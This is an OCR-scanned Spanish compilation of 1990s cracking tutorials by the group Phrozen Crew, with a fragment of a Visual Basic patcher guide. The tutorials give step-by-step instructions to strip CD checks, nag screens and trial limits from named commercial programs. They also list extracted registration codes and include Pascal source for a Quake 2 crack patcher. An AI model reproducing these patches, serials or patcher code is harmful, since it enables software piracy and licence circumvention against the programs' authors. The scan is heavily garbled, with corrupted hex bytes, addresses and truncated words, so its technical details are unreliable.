:00430A22 A194264300 mov eax, dword ptr [00432694] 


- Paso 17.- Ahora hecharas un buen vistazo. Hmm, 430B02, esta demasiado lejos del salto 
desde 430A1C, piensas que saltará muy lejos si eres un buen chico? Yo no pienso así. Mira a la 
dirección 430B02: 


:00430B02 A1A0264300 mov eax, dword ptr [004326A0] 
:00430B07 ES6C04FFFF call 00420F78 
:00430B26 E8C928FDFF call 004033F4 


- Como ves 430B02 esta cerca de 430B2B (lo que quiere decir que vuelve antes de que la 
llamada se produzca) Así que no puede ser que salte, así que normalmente tengo que hacer esto, 
encontrar la última comparación antes del comando RET. 


- Paso 18.- Ahora tenemos que apuntar y buscar: 


:00430ADC 740C je 00430AEA <---- 1f kewl, jump to good boy 


:00430ADE A1A0264300 mov eax, dword ptr [004326A0] 
:00430AE3 EsS9004FFFF call 00420F78 


:00430AE8 EB22 jmp 00430B0C <---- jump to bad boy (final part) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


[:00430ADC(C) 

:00430AEA A19C264300 mov eax, dword ptr [0043269C] 

:00430AEF 8B80E0010000 mov eax, dword ptr [eax+000001E0] 
:00430AF5 8B15D4264300 mov edx, dword ptr [004326D4] <---- regcode! 


Así que sabremos que tenemos que arreglar la dirección 4W30ADC! Asegurate de que la barra 
verde esta en 00430ADC 740C, con lo que verás la dirección de compensación (O Offset 
0002FEDCh). Es donde puedes hacer el parche para TRAYRUN.EXE. 


- Paso 19.- Vuelve a WC, ejecuta HIEW TRAYRUN.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, pon 2FEDC, y deberías ver algo como: 


0002FEDC: 740C je 00002FEEA ---------- (1) 
0002FEDE: A1A0264300 mov  eax,[0004326A0] 

0002FEE3: ES9004FFFF call 000020378 ---------- 0) 
0002FEE8: EB22 jmps O0002FFOC ---------- (3) 


0002FEEA: A19C264300 mov  eax,[00043269C] 


Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los cambios y sal 
de HIEW. 


- Paso 20.- Ahora ejecuta TRAYRUN.EXE... No NAG so far, ahora haz click en about. Wow, 
esta registrado! 


Parte 5: Código fuente Pascal para parches, por tKC/PC “98 


Uses Crt; 


Const A: Array[1..1] of Record (<-------- 1 bytes to be patched] 
A : Longint; 
B : Byte; 
End = 


((A:$28436;B:$EB)); ([<--------------- offset "28436" and byte "EB" to be changed) 


Var Ch:Char; 
I:Byte; 
F:File; 


EN:file of byte; 


Size:longint; 


Begin 


Writeln(Little Patch');writeln(Crack for Quake 2 3.10 by tKC/PC "98"; 
Assign(F,QUAKE2.EXE”); ( <=---=--=------ filename to be patched) 
[SI-) Reset(F, 1); (SI+-) 
If IOResult <> O then 
begin 
writeln('File not found!”); 
halt(1); 
end; 
For I:=1 to 1 d0 [<a 4 bytes to be patched]) 
Begin 
Seek(F,A[I].A); 
Ch:=Char(A[I].B); 
Blockwrite(F,Ch, 1); 


End; 


Writeln('File successfully patched!'); 


End. 


Últimas palabras: 


Espero que te hayas divertido con este tutorial mucho más de lo que yo lo hize! J 


Te veré la próxima vez en el tutorial +7. 


Agradecimientos a Celeste, Hanna, Kandi, Lizel, Taha, PowerLord y a todo el mundo en el canal 
PC98! 


Este tutorial esta dedicado a Celeste... pretty woman. 


Puedes encontrarme en 4+PC98 o mandame un email a tkcO goplay.com 


Que te diviertas!, 
The Keyboard Caper, 
El Fundador de PhRoZeN CreW “94-98 


2-2-1998 


tKC CRACKING TUTOR, LECCIÓN 7 


Bienvenido al tutorial del cracker +7! 


Phew, muchas abejas me han preguntado si iba a continuar escribiendo tutoriales. Así que tu 


estas mirando a esta nueva versión de Windows! Espero que te guste este kewl proggie! J Más 
abejas... cought 


Peligro! Este tutorial es realmente una madre!! Sonrisa 


En este tutorial te enseñaré todo sobre W32Dasm y Softlce. Gracias a Dios por un nuevo 
superPC! 


Ok, let's rave!! 


Contenidos: 


1) Como eliminar la comprobación de CD en Balls of Steel 1.1 usando W32Dasm 


URL: http://www.pinfllwizards.com/bosdownload.htm 


2) Como eliminar el NAG y el límite de 30 días en NeverForget 1.00 , usando W32Dasm 


URL: http://www.neverforget.com/trial.html 


3) Como registrarse en Phone Plus 2.00, usando Softlce 


URL: http://www.aros.net/-impulse 


4) Como registrarse en WinPatch 1.0.06, usando Softlce 


URL: http://www.artistry.com/products/winpatch/wp.exe 


5) Sumario 


6) Mis últimas palabras 


Herramientas: 


Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


W32Dasm 8.9: http://www .fortunecity.com/bally/waterford/18/w32dasm809.zip 


Hacker”s View 5.66: ftp://ftp.cdrom.com/.27/sac/utilprog/hiewS66.zip 


Far 1.50b: ftp://rwntug.quarta.msk.ru/WinUtil/Rar/Far150b.exe 


Windows Commander 3.50 Beta 7: http://www.ghisler.com 


O pregunta a cualquier cracker por estas herramientas, ellos estarán contentos por servirte! 


A próposito: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros programas 
en: http://cracking.home.ml.org 


Asegurate de tener estas herramientas para el próximo tutorial!! 


Parte 1: Como eliminar la comprobación de CD en Balls of Steel 1.1 


- Paso 1.- Ejecuta BOS.EXE 


- Paso 2.- Veras el mensaje que dice que debes insertar el CD para jugar. Ok, no problem, 
apunta el mensaje. (“Please inset tha Balls of Steel CD and click...”) 


- Paso 3.- Ok, sal del programa. 

- Paso 4.- Ejecuta WC, y ve al directorio de BOS. 

- Paso 5.- Copia BOS.EXE a BOS.EXX, y copia BOS.EXE a BOS.W32. 
- Paso 6.- Ejecuta W32Dasm y desensambla BOS.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE y escribe: 
“Please insert the Balls of Steel...” (Recuerda este mensaje) y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, y de verías ver la línea: 
:00439882 B9F4984300 mov ecx, 004398F4 
* Possible StringData Ref from Code Obj ->"Please insert the Balls of Steel " 


- Paso 9.- Ok, vamos a ver que llamadas realiza este procedimiento. Hmm, debemos volver al 
principio de este procedimiento. 


- Paso 10.- Pulsa RePág 2 o 3 veces y encontramos: 


- Paso 11.- Ok, vamos a ver que llamadas realiza este procedimiento. Mira arriba, la referencia 
a la llamada en 4399D3. 


- Paso 12.- Ah! Encontramos la llamada aquí: 
:004399D5 ESCAFDFFFF call 004397A4 


- Paso 13.- Hmm, vamos a ver que pasa con esta llamada. Asegurate de que la barra verde esta 
en 004399D5 ESCAFDFFFF call 004397A4 y verás la dirección de compensación bajo la 
pantalla, (O Offset 00038DD5h). Es donde puedes hacer el parche para BOS.EXE. 


- Paso 14.- Vuelve a WC, ejecuta HIEW BOS.EXE, pulsa F4 para seleccionar modo 


descodificador (ASM), pulsa FS y pon 38DDS. Deberías ver lo siguiente: 


00038DD5: ESCAFDFFFF call 000038BA4  ---------- dd) 
00038DDA: ESD1FBFFFF call 0000389B0 ---------- Q) 
00038DDF: 8BOB mov  ecx,[ebx] 
00038DD5: ESCAFDFFFF call 000038BA4  ---------- d) 
00038DDA: ESD1FBFFFF call 0000389B0 ---------- Q) 
00038DDF: 8BOB mov  ecx,[ebx] 


- Paso 15.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 9090909090, pulsa F9 para 
guardar los cambios y sal de HIEW. 


- Paso 16.- Ejecuta BOS.EXE, funciona? Heeyaa Lo has hecho!! 


Parte 2: Como eliminar el NAG y el límite de 30 días en NeverForget 
1.00 


- Paso 1.- Ejecuta NeverForget.exe 


- Paso 2.- Veras ese NAG, muy irritante, no? Ok, no problem, apunta el mensaje. (“Demo 
version 1.00 installed on...”) 


- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de NeverForget. 


- Paso 5.- Copia NeverForget.exe a NeverForget.exx, y copia NeverForget.exe a 
NeverForget.W32. 


- Paso 6.- Ejecuta W32Dasm, y desensambla NeverForget.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y pon “Demo 
version” (Recuerda este mensaje) y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, con lo que deberías ver la siguiente línea: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:00408D55(C) <--- what's it? 


* Possible StringData Ref from Data Obj ->"Demo version " 


- Paso 9.- Ok, vamos a ver que salto realiza este proceso. Mira arriba, a la referencia por la 
llamada en 408D55! Haz click en Goto Code Location, y pon 408D35. 


- Paso 10.- Ahora encontramos el salto aquí: 


:00408D55 0F84F30B0000 je 0040994E 
:00408D5B 53 push ebx 
:00408D5C 53 push ebx 


- Paso 11.- Ok, si miramos abajo, encontraremos también la comprobación de tiempo. (“Will 
expire soon”) Así que, si esquibamos este salto... pero a donde podemos saltar? Vamos a hechar 
un buen vistazo a: 


:00408E2B 53 push ebx 


- Paso 12.- Este debe ser el final de la comprobación de tiempo. Vamos a ver que pasa si 
saltamos a esta dirección. Asegurate de que la barra cyan esta en 00408E2B 53 push ebx y verás 
la dirección de compensación bajo la pantalla, (E Offset 0O00822Bh). Recuerda este Offset. Y 
volvemos a la dirección 408D55, este offset debería ser 8155h, no? 


- Paso 13.- Ok, vuelve a WC, ejecuta HIEW NEVERF-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, y pon 8155, deberías ver algo como: 


00008155: 0F34F30B0000 je  000008D4E  ---------- (1) 
0000815B: 53 push ebx 
- Paso 14.- Ahora pulsa F3, luego TAB, pon “¡mp 822B” y pulsa ESC. Veras: 
00008155: E9D1000000 jmp 00000822B 
- Paso 15.- Ahora puedes pulsar F9 para guardar los cambios y salir de HIEW. 


- Paso 16.- Ejecuta NeverForget.EXE. boom. No NAGs, no ha caducado! Kewl, lo has hecho!! 


Parte 3: Como registrarse en Phone Plus 2.00 
- Paso 1.- Ejecuta Phone.EXE 


- Paso 2.- Ahora ves ese NAG, parece mierda, no? Ok, no problem, haz click en “Enter 
Registration Code..” 


- Paso 3.- Pulsa CTRL-D para activar Softlce. 
- Paso 4.- Escribe BPPX GETWINDOWSTEXTA y pulsa FS para volver a PhonePlus. 
- Paso 5.- Pon “tKC/Pc “98” como tu nombre y “12345” como tu código, y haz click en OK. 


- Paso 6.- Ahora estas de vuelta en Softlce, escribe D EAX, y ahora ves “12345” en Data 
Window. 


- Paso 7.- Hmm, no... pulsa FS, escribe D EAX, ah, encuentras “tKC/PC “98” en Data Window. 
Boom 


- Paso 8.- Pulsa F11 para llamar al caller. Ves EAX=00000000A en Register Window. Es el 
largo para nuestro nombre (Probamos? A y consigues 10) 


- Paso 9.- Ahora estamos en el lugar correcto. Rastrea al descendiente (Pulsa F10) hasta ver: 
015F:7C69D80F POP EDI 


- Paso 10.- Escribe D ECX, también veras nuestro nombre en Data Window. Rastrea otra vez 
(F10) hasta conseguir: 


015F:0040EC61 CALL 0040ECBA 


- Paso 11.- Desde que sabemos que esta es la última llamada antes de que el mensaje de error 
explote. Necesitamos ir dentro de esta llamada. Pulsa FS para rastrear la llamada. 


- Paso 12.- Rastrea hasta ver: 

015F:7C681D37 MOV ESI,ECX 
- Paso 13.- Ahora escribe D EAX, y que vemos en Data Window? Nuestro código 
- Paso 14.- Pon BD* y pulsa FS para volver a PhonePlus. 


- Paso 15.- Pon “*1P3201795” boom registrado!! 


Parte 4: Como registrarse en WinPatch 
- Paso 1.- Ejecuta WinPatch.EXE. 


- Paso 2.- Ahora ves ese NAG, parece mierda, no? Ok, no problem, haz click en “Enter 
Registration Code..” 


- Paso 3.- Pulsa CTRL-D para activar Softlce. 
- Paso 4.- Escribe BPX GETWINDOWSTEXTA y pulsa FS para volver a WinPatch. 


- Paso 5.- Pon “The Keyboard Caper” como tu nombre y “12345” como ID, y “Phrozen Crew 
“98” como empresa. Luego haz click en OK. 


- Paso 6.- Ahora estas de vuelta en Softlce, escribe D EAX, y ahora ves nuestro nombre en 


Data Window. 


- Paso 7.- Hmm, no... pulsa FS, escribe D EAX, ah, encuentras “12345” en Data Window, no 
esta listo todavía. 


- Paso 8.- Pulsa FS otra vez, pon D EAX boom nuestra empresa en Data Window. We are 
ready to rave. 


- Paso 9.- Pulsa F11 para llamar al caller. Ves EAX=00000010 en Register Window. Es el 
largo para nuestra empresa (Probamos? 10 y consigues 16) 


- Paso 10.- Ahora estamos en el lugar correcto. Rastrea al descendiente (Pulsa F10) hasta ver: 
015F:0040F2A1 PUSH EDX 
015F:0040F2A2 PUSH EAX 
015F:0040F2A3 CALL 00416B50 


- Paso 11.- Desde que sabemos que esta es la última llamada antes de el mensaje de error 
explote. Let's try, pon D EAX, y que ves en Data Window? Nuestro código 


- Paso 12.- Pon BD* y pulsa FS para volver a WinPatch. 


- Paso 13.- Pon “DéáL-1121-1941-3638” boom registrado!! 


Parte 5: Sumario 


Una vez cargado Softlce, no puedes desactivarlo haste que reinicies tu PC. Para verificar que 
Softlce esta cargado, pulsa la Hot-key de Softlce (Crtl-D). La pantalla de Softlce debería 
aparecer. Para volver a Windows usa X (exit) o G (goto), o ES. 


Para la ayuda usa H o Fl. 


Para rastrear a traves de un código fuente, usa T o ES. 


Para rastrear sin ir paso a paso en las llamdas, saltos ect, usa P o F10. 


Para fijar puntos de detención, usa BPX <función> ej: BPX GETWINDOWTEXTA o BPX 
GETDLGITEMTEXTA. 


Para ver puntos de detención, usa BL. 


Para despejar todos los puntos de detención, usa BC*, o el primer punto de detención. Luego 
BCO ect. 


Para activar el punto de detención, usa BEO o BE* para todos los puntos de detención. 
Para desactivar puntos de detención, usa BDO o BD* para todos los puntos de detención. 
Para ir dentro de una función, usa Fl 1. 


En el próximo tutorial te daré más detalles de SoftIce. 


Últimas palabras: 

Espero de verdad que te hayas divertido con este tutorial más de lo que yo lo hize! 

Si me preguntas amablemente, luego abrá una oportunidad de que consigas el tutorial +8 
Agradecimientos a Celeste, Nicolene, Taha é a todo el mundo en el canal PC98! 


Puedes encontrame en 4+PC98 o mandandome un email a tkc Oreaper.org 


Que te diviertas, 
The Keyboard Caper, 


El Fundador de PhRoZeN CreW “94-98 


7-3-1998 


tKKC CRACKING TUTOR, LECCIÓN 8 


Bienvenido al tutorial de crackers +8! 

Yikes! Aquí estamos otra vez! Más abejas... cough.. cough Ok, no es un gran problema. 
Estoy contento de que a la gente le guste esta versión! Así que estaré en este estilo de libros! 
Peligro!!, este tutorial es realmente una madre!! Sonrisa 

Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! 


Ok, let's rave!! 
Contenidos: 


1) Como desbloquear CaptureEze97 6.0, usando Softlce. 


URL: http://www .screencapture.com/c97setup.exe 


2) Como registrarse en MPEG Player 1.76, usando Softlce. 


URL: ftp://ftp.simtel.net/pub/simtelnet/win95/mmedia/mpegp176.zip 


3) Como registrarse en WinXFiles 2.8, usando Softlce £ W32Dasm. 


URL: http://www .pepsoft.com/wxf3228.zip 


4) Como registrarse en CD-R Diagnostic 0.1.1.3, usando SoftIce. 


URL: http://www.enteract.com/-pcrowley/windows/cdrdiagverl13.exe 


5) Trucos para Softlce 


6) Mis últimas palabras 


Herramientas: 


Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


W32Dasm 8.9: http://www .fortunecity.com/bally/waterford/18/w32dasm809.zip 


Hacker's View 5.66: ftp://ftp.cdrom.com/.27/sac/utilprog/hiew566.zip 


Far 1.50b: ftp://rwntug.quarta.msk.ru/WinUtil/Rar/Far150b.exe 


Windows Commander 3.50 Beta 7: http://www.ghisler.com 


O pregunta a cualquier cracker por estas herramientas, ellos estaráncontentos por servirte! 


A próposito: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros programas 
en: http://cracking.home.ml.org 


No me digas que no tienes estas herramientas para el próximo tutorial! 


Parte 1: Como desbloquear CaptureEze97 6.0 


Sugerencia: Una vez que el programa es desbloqueado, sigue siendo una versión de prueba, solo 
has eliminado el límite de tiempo. Tendrás que comprar la versión completa. 


- Paso 1.- Ejecuta CAPEZE97.EXE. 


- Paso 2.- Verás la ventana que dice que te quedan 45 días de prueba. Ok, no problem, haz click 
en Purchase. Pon “tKC” como nombre de usuario, “PC 98” como empresa, y “12345” como 
código. 


- Paso 3.- Pulsa CTRL-D para activar Softlce. 
- Paso 4.- Escribe BPPX GETWINDOWTEXTA y pulsa FS para volver a CAPEZE. 
- Paso 5.- Haz click en OK, y ahora estas de vuelta en Softlce, pulsa ES. 


- Paso 6.- Puedes pulsar F11 si quieres, pero esto llevará a un largo rastreo, así que lo mejor es 
pulsar FS otra vez y luego Fl 1, para obtener al llamador. 


- Paso 7.- Ves EAX=00000006 en Register Window? Es el largo para nuestra compañía. 
Sabemos que estamos cerca del nido de la arrabalera. Estamos consiguiendolo allí. 


- Paso 8.- Ratrea los descendientes (F10) hasta ver: 
015F:00633FC1 LEA EAX,[EBP-14] 2P11<---our false code”p 
015F:00633FC4 LEA ECX,[EBP-28] P11<---our code!!%p 
015F:00633FC7 PUSH EAX 


015F:00633FC8 PUSH ECX 


- Paso 9.- Ahora escribe D EAX, Ves “12345” en Data Window? Ok, kewl 
- Paso 10.- Escribe D ECX. Que ves en la Data Window? nuestro código. 
- Paso 11.- Pon BD* y pulsa FS para volver a CAPEZE. 

- Paso 12.-Pon “4422028906994041” unlocked!! 


- Paso 13.- Si no quieres desbloquearlo, puedes encontrar un código restaurar el programa a 
periodo de demostración pulsando Fl0 hasta ver: 


015F:00634034 LEA EAX,[EBP-14] 
015F:00634037 LEA ECX,[EBP-28] 
015F:0063403A PUSH EAX 
015F:0063403B PUSH ECX 
- Paso 14.- Pon D ECX y encontrarás un código para volver al período de demostración. 


(Nuestro código puede ser diferente, desde que te pregunta por el nombre cuando lo instalas la 1* 
vez!) 


Parte 2: Como registrarse en MPEG Player 1.76 

- Paso 1.- Ejecuta MPEGP32.EXE 

- Paso 2.- Verás ese NAG, muy irritante, no? Ok, no problem, haz click en About/Registration. 
- Paso 3.- Pon “tKC/PC “98” como nombre de usuario y “12345” como código. 

- Paso 4.- Pulsa CRTL-D para activar Softlce. 


- Paso 5.- Escribe GETDLGITEMTEXTA y pulsa FS para volver a MPEGP32. 


- Paso 6.- Haz click en Register, y ahora estas de vuelta en Softlce, pulsa ES. 


- Paso 7.- Ahora pulsa F11, para llamar al caller. Ves EAX=000000053 en Register Window? Es 
fácil adivinar que es. El largo para nuestro código. 


- Paso 8.- Ok, ahora deberías ver: 
015F:0040A161 PUSH 00449140 
015F:0040A166 PUSH 0043CCCO 


- Paso 9.- Pon D 449140 y deberías ver “12345” en Data Window. Pon también D 43CCCO0 y 
verás nuestro nombre. 


- Paso 10.- Ok, pulsa F10 hasta estar en: 


- Paso 11.- Necesitamos ir dentro de esta llamada. Esta es la última llamada antes de que el 
mensaje de error explote. Ok, ahora pulsa F8 para ir dentro de la llamada. 


- Paso 12.- Rastrea los descendientes (F10), hasta ver: 
015F:0040E75D MOV ESI,[ESP+0C] 
015F:0040E761 MOV EDL[ESP+10] 
015F:0040E765 LEA EDX,[ESP+0C] 


- Paso 13.- Que tenemos? Ves ESI=13EE3B42 y EDI=BEO96ACF en Register Window?. 
Estamos entrando en el nido de la arrabalera. ] Ok, pulsa F10 hasta que estemos en: 


015F:0040E79F LEA EAX,[ESP+0000010C] 
015F:0040E7A6 MOV DL,[EAX] 
- Paso 14.- Pon D EAX, y que ves en Data Window? nuestro código 
- Paso 15.- Pon BD* y pulsa FS para volver a MPEGP32. 


- Paso 16.- Pon “13ee3b42-be096acf” boom registrado!! 


Parte 3: Como registrarse en WinXFiles 2.8 


Consejo: Este programa esta escrito en Delphi, y a veces usa su propio manipulador. Así que 
tendremos que usar W32Dasm y Softlce para entrar en el nido de la arrabalera. ] 


- Paso 1.- Ejecuta WXFILES.EXE. 
- Paso 2.- Haz click en Register, pon “tKC/PC “98” como nombre y “12345” como código. 


- Paso 3.- Pulsa CRTL-D para activar Softlce, pon BPX GETWINDOWTEXTA y también 
BPX GETDLGITEMTEXTA. 


- Paso 4.- Pulsa FS para volver a WXFILES y haz click en OK. 


- Paso 5.- Hmm, no ha pasado nada. A Delphi no le gusta eso de GETxxxxxxxx exp's.. (Dios 
sabe porque adoro Delphi) ] Ok, no es un gran problema, abre W32Dasm y desensambla 
WXFILES.EXE. 


- Paso 6.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Inválid Registration Password” y haz doble click en el. 


- Paso 7.- Cierra la ventana SDR, y deberías ver lo siguiente: 
:00482A1A 668B0ODAC2A4800 mov cx, word ptr [00482AAC] 
:00482A21 B202 mov dl, 02 
* Possible StringData Ref from Code Obj ->"Invalid Registration Password." 
- Paso 8.- Ahora pulsa RePág hasta ver: 
:00482990 8D95D4FBFFFF lea edx, dword ptr [ebp+FFFFFBDA4] 


:00482996 8B45FC mov eax, dword ptr [ebp-04] 


:004829C8 754E jne 00482A18 “P11<---jump if wrong code*p 


:004829CA 8B45FC mov eax, dword ptr [ebp-04] 


- Paso 9.- Ok, tenemos la dirección (482990) y queremos usar esto en Softlce. Cierra 
W32Dasm. 


- Paso 10.- Vuelve a WXFILES, pon tu nombre y código otra vez. No pulses OK todavía. 


- Paso 11.- Pulsa CRTL-D para activar Softlce, pon BPX SHOWWINDOW y pulsa FS. Y 
ahora puedes hacer click en Ok. 


- Paso 12.- Boom Ahora estas en Softlce. Ok, escribe G 482990 (no necesitas pulsar FS!) 
Estarás de vuelta en WXFILES. Pon el código, y haz click en OK otra vez. 


- Paso 13.- Bomm Ves la merecida rotura en (GET=x.xx seconds) Kewl, entramos en el nido 
de la arrabalera. 


- Paso 14.- Ahora pon BD* y pulsa F10 abajo hasta ver: 

015F:004829AB LEA EAX,[EBP+FFFFFBD8] 

- Paso 15.- Pon D EAX y ves “12345” en Data Window. Kewl, getting on... 
- Paso 16.- Pulsa F10 abajo hasta estar en: 

015F:004829C2 POP EAX 

- Paso 17.- Ahora pon D EDX y que ves en Data Window? Arrabalera!! 

- Paso 18.- Pulsa F3 y vuelve a WXFILES. 


- Paso 19.- Pon MCGBVPFMWBAMYXQ BOOM Registrado!! 


Parte 4: Como registrarse en CD-R Diagnostic 0.1.1.3 

- Paso 1.- Ejecuta CRDIAG.EXE 

- Paso 2.- Verás ese NAG, mierda, no? Ok, no problem, haz click en Help/Registration. 
- Paso 3.- Pon “tKC/PC “98” como nombre y “12345” como código. 

- Paso 4.- Pulsa CRTL-D para activar Softlce. 

- Paso 5.- Pon GETDLGITEMTEXTA y pulsa FS para volver a CRDIAG. 

- Paso 6.- Haz click en OK y ahora estas de vuelta en Softlce. 


- Paso 7.- Ahora pulsa F11 para conseguir el llamador. Ver EAX=00000005 en Register 
Window? Es fácil adivinar que es. El largo de nuestro código. 


- Paso 8.- Ok, ahora deberías ver: 

015F:00408AC0 MOV DL,[0041B640] 

- Paso 9.- Pon D 41B640 y deberías ver “12345” en Data Window. 
- Paso 10.- Ok, ahora pulsa F10 abajo hasta estar en: 
015F:00408B26 ADD ESP,04 

- Paso 11.- Deberías ver EAX=0000204C en Register Window. 

- Paso 12.- Ahora escribe ? EAX y tenemos: 

0000204C 0000008268 " L” 


- Paso 13.- Que ves? 8268 es una parte de nuestro código de 4 dígitos. El autor no tan listo 


como pensamos. Si miras detenidamente al código, necesita 8 dígitos para la combinacion 
correcta. El coje el primer y segundo dígito fuera de “$268” para añadirlo al código, y tenemos 
un código de 6 dígitos. Lo hace de nuevo, coje el primer y el segundo dígito fuera de “S28268” y 
lo añade al código, y tenemos el código de 8 dígitos. Ejemplo: 


1) 
Digits: 1234 


Code: 8268 


2) 
Digits: 123456 


Code: 828268 


3) 
Digits: 12345678 


Code: 82828268 


- Paso 14.- Ahora nuestro código debería ser 822828268. Let's try, pon BD* y pulsa FS para 
volver a CRDIAG. 


- Paso 15.- Pon “82828268” boom Registered!! 


Parte 5: Trucos para Softlce 


Aquí están los breake points más frecuentes para el Soft Ice: 


Reading/Writing files: 


ReadHFile 


WriteHile 


CreateFileA 


Leyendo datos en los archivos INI: 


GetPrivateProfileStringA 


GetPrivateProfilelntA 


WritePrivateProfileStringA 


WritePrivateProfilelntA 


Acceso al registro: 


RegCreateKeyA 


RegDeleteKeyA 


RegQueryValueA 


RegCloseKeyA 


RegOpenKeyA 


Dialog Boxes: 


GetWindowTextA 


GetDlgltemTextA 


GetDlgltemInt 


Message Boxes: 


MessageBox 


MessageBoxA 


MessageBoxExA 


MessageBeep 


Tiempo y fecha: 


GetLocalTime 


GetSystemTime 


GetFileTime 


Creating a window (like a NAG): 
Create WindowExA 


ShowWindow 


Thanks go to THE_q for this tips... 


5) Últimas palabras: 
Espero de verdad que te hayas divertido con este tutorial más de lo que yo lo hize! 


En el próximo tutorial, te daré lecciones más avanzadas. Si me preguntas amablemente, obtendrás 
el tutorial +9. 


Tengo unas palabras llenas de sabiduría de alguien, dicen esto: 
If you give a person a crack, 

he will be hungry again. 

If you teach a person to crack, 

he will never be hungry again! 

Traducción por dek_Oin: 


Si le das un crack a alguien, 


estará ambriento otra vez. 


Si enseñas a crackear a ese alguien, 


nunca estará hambriento otra vez! 


Agradecimientos a: Taha, Taylor, Kim, Tracy, Nitallica, Kristina 8 a todo el mundo en el canal 
PC98! Yea babes again! Suspiro J 


Puedes encontrarme en el canal 4PC98 o mandandome un email a tkc Oreaper.org 


Que te diviertas! 


The Keyboard Caper, 


The Founder of PhRoZeN CreW “94-“098 


7-4-1998 


Nota de dek_Oin: lo único que hice con este manual fue traducir algunas partes, pasarlo a 
formato HTML y corregirlo(si que me costó!!!). No me hago responsable del uso que se le 
pueda dar. Si no entiendes algo, no me mandes ningún mail. Manda uno al autor del 
manual, o sea, tKC. 


ASTALAVISTA 


Introducción 


Hace tiempo que no escribía tutoriales , debido a la falta de tiempo durante el año pasado causado por el maldito colegio y en especial por la 
prueba aptitud académica, aunque valio la pena perder el tiempo al 
preparar la PAA porque quede estudiando lo que quería , Ingenieria CIVIL en Informática :) 


¡Lo que vamos a hacer ahora es crear un parche utilizando Visual Basic para asi no depender de programas que generan crack como codefusion que 
colocan iconos que a ti no te interesan y no te dejan crear un crack personalizado. 


Voy a explicar la construcción del parche colocando un programa de ejmplo que yo crackie, la víctima se llama AtomixMP3 y sirve para mezclar 
música MP3, muy buena herramienta para mezclar musica como por ej. Los STP con Green Day o con Pearl Jam o Led Zeppelín ... 


Al Atake 


Abrimos el programa y nos sale un tremendo nag que nos informa que el programa es una versión de prueba "TRIAL VERSION", después nos 
encontramos con el programa y vemos que no tiene límite de tiempo, ni otros nags, nada, por lo tanto hay que atacar al nags utilizando el Softlce. 


Introducimos nuestro BXP favorito, el hmemcpy, ahora que salto vamos traceando F!2,F10... hasta que nos encontramos con la sentencia que nos 
manda el nag la llamada Update Windows. La cual se encuentra en :4263E2 

Ahora con el Wdasm vamos a buscar la linea para ver que pasa con el código, la buscamos y nos fijamos que alrededor de la llamada un poco mas 
abajo de la llamada UW, encontramos una referencia de un salto condicional ¿Será nuestro salto salvador? Seguimos al salto, anotamos su offset, , 
con un editor hexadecimal, te recomiendo el Hview, cambiamos el salto JE por JNE (74 por 75) y vemos que ya no aparece el estúpido nag. 


Más Diversión 


Si queremos borrar las palabras TRIAL VERSION del nag, solamente tenemos que abrir el Resource Hacker ( si no tienes esta herramienta cortate 
las venas, saca algunas veces de apuro) y buscamos el nag, rescatamos el nags y lo editamos con el Paint. 


Hacer esto es un poco latoso pero yo me di el tiempo de editarlo ( como ahora tengo de sobra) , aqui coloco el archivo si quieres colocar el nag sin las 
letras : ) 


Creando el Parch 


ntes de hacer el parche debes saber lo siguiente del programa a parchear 


- su offset 
- el tamaño del archivo a parchear 
- la sentencia a cambiar. 


os datos de estos para el AtomixMP3 son los sgtes: 
- offset : h26394 

- 1392692 ( 1 mb, 392 kb, 692 byte) 

- je por jne (74 por 75) 


brimos el VB y creamos un nuevo proyecto colocamos 3 commandbutton y un textbox, asi yo lo hice: 


(figl) 
1 botón About 


ste botón es opcional, para crear la ventana tenemos que agregar un nuevo formulario, una vez colocado los datos, Nombre del Cracker, Equipo, 
tc... tienes que ir a ver/Explorador de proyectos una vez alli verás esto 


sto indica que Forml es el nombre de la ventana principal que le da VB y el nombre entre paréntesis es el nombre del archivo fisico, siempre 
tilizaremos el primer nombre en este caso forml, aca forml es el formulario de la ventana principal (fig1) y frmAbout es el formulario de la caja 
about. 

ora nos vamos al formulario forml1 (o el que tu tengas como formulario principal) le damos 2 click al boton about para ver el codigo del boton y 
olocamos el siguiente código para conectar la caja about con el commandboton: 


rivate Sub Command1_Click() 
rmAbout.Show vbmodal 
nd Sub 


rmabout ( es el nombre del formulario al cual hacemos referencia a la caja about) 
Show despliega el formulario 
bmodal (opcional) cuando se muestre la caja about el formulario principal quede en segundo plano (inactivo) 


1 botón Salir 
ara salir de programa es tan fácil como colocar el siguiente codigo al boton salir 
rivate Sub Command2_Click() 


1 boton Parchear ( el + importante ) 
es que crear una funcion llamada existe para saber si el archivo que colocamos en el textbox realmente existe. 

rivate Function Existe(ByVal unFichero As String) As Boolean 

/ Definimos aca que la funcion es privada osea se utilizara solamente en el formulario forml 

/ Después en el paréntesis indicamos que la variable un fichero sera el de tipo cadena esto tiene que ver con la ruta que ingresamos la localización del 
archivo (c:/.../...) esto es cadena. 
. Boolean es una funcion que nos devuelve un valor true si el archivo existe o false si no existe. 


On Local Error Resume Next 
On Local Error GoTo 0 


/ Si nos tira un error terminar la funcion y tirar false 
en(Dir$(unFichero)) 
/ Funcion que nos indica el tamaño del archivo , si el valor es O byte nos tira O 


f Err Then 

xiste = False 

nd If 

r=0 

/ 

F (sentencia) THEN (sentencia) ELSE (sentencia) ENDIF finaliza condicion (esta mas abajo) 
Si se nos tira de len un valor O entonces existe tomara un valor false si no Err=0 indica que el archivo existe y es distinto de O byte por lo tanto tirara 

n valor TRUE 

